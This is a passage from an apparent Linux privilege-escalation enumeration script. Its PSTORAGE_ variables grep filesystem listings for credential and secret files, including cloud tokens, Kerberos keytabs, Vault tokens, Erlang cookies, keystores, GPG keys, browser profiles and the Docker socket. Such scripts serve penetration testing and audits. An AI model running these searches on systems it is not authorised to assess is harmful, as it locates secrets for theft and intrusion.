"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/lib' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E 'README.gnupg' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e 